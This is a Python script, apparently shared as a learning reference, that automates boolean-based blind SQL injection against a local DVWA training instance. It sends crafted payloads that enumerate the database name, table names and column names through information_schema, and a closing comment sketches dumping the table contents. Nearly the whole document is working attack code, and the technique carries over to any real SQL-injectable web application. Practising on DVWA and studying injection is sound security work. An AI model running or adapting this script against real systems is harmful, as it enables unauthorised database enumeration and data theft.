仅供学习代码参考
1#python dvwa布尔盲注自动化脚本
2 import requests
3 import string
4 import time
5 INIT_URL="http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/sqli_blind/index.php?id="
6 token={"security":"low","PHPSESSID":"p7g937ga5glcvg8m5hv9o9a2ht"} #登录身份识别
7 COLUMN_NUM=11
8 COLUMN_LEN=15
9 dbLen=0
10 dbname=''
11 table_num=0
12 table=[]
13 table_name='' #暂存用
14 column=[]
15 column_name=''#暂存用
16 rightLen=0
17
18 time_start=time.time()
19 url=INIT_URL+"1&Submit=Submit#"
20 rightLen=len(requests.get(url=url,cookies=token).text)
21 print("正常返回文本长度:"+str(rightLen))
22 #1.猜解数据库名长度 poc:" 1'and (select length(database()))="+str(dbLen)#"
23 while True:
24 dbLen +=1
25 dbUrl=INIT_URL+"1'and (select length(database()))="+str(dbLen)+"%23&Submit=Submit#"
26 print(dbUrl)
27 if len(requests.get(url=dbUrl,cookies=token).text)==rightLen:
28 print("数据库长度:"+str(dbLen))
29 break
30 #2.猜解数据库名字 poc:" 1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1#"
31 for i in range(1,dbLen+1):
32 for j in string.ascii_lowercase:
33 dbnameUrl=INIT_URL+"1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1%23&Submit=Submit#"
34 print(dbnameUrl)
35 if len(requests.get(url=dbnameUrl,cookies=token).text)==rightLen:
36 dbname+=j
37 break
38
39 print("数据库名字:"+dbname)
40
41 #3.猜解数据库表数量 poc:" 1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)#"
42
43 for i in range(100):
44 dbUrl=INIT_URL+"1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)+"%23&Submit=Submit#"
45 print(dbUrl)
46 if len(requests.get(dbUrl,cookies=token).text)==rightLen:
47 print("表数量"+str(i))
48 table_num=i
49 break
50
51 #4.猜解表名 poc:" 1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1)))=103#
52
53 for i in range(table_num):
54 for k in range(COLUMN_LEN):
55 for j in range(48,123):
56 dbUrl=INIT_URL+"1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit "+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"
57 print(dbUrl)
58 if len(requests.get(dbUrl,cookies=token).text)==rightLen:
59 table_name+=chr(j)
60 print(table_name)
61 break
62 table.append(table_name)
63 table_name=''
64 print("表名:"+str(table))
65
66
67
68 #5.猜解列名 poc :" 1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1)))=i
69
70
71 for m in range(table_num):
72 for i in range(COLUMN_NUM):
73 for k in range(COLUMN_LEN):
74 for j in range(48,123):
75 dbUrl=INIT_URL+"1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"'and table_name='"+table[m]+"' limit "+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"
76 print(dbUrl)
77 if len(requests.get(dbUrl,cookies=token).text)==rightLen:
78 column_name+=chr(j)
79 print(column_name)
80 break
81 column_name+='/'
82 column.append(column_name)
83 column_name=''
84 print("列名:"+str(column))
85
86 time_end=time.time()
87 print('用时:',time_end-time_start,'s')
88 print("正常返回文本长度:"+str(rightLen))
89 print("数据库长度:"+str(dbLen))
90 print("数据库名字:"+dbname)
91 print("表数量"+str(i))
92 print("表名:"+str(table))
93 print("列名:"+str(column))
94 #6.拖库 poc: 1'and (select ascii(substr((select column[i] from dbname.table[j] limit 0,1),1,1)))=i
95 #具体列具体猜解,全部猜解时间太高
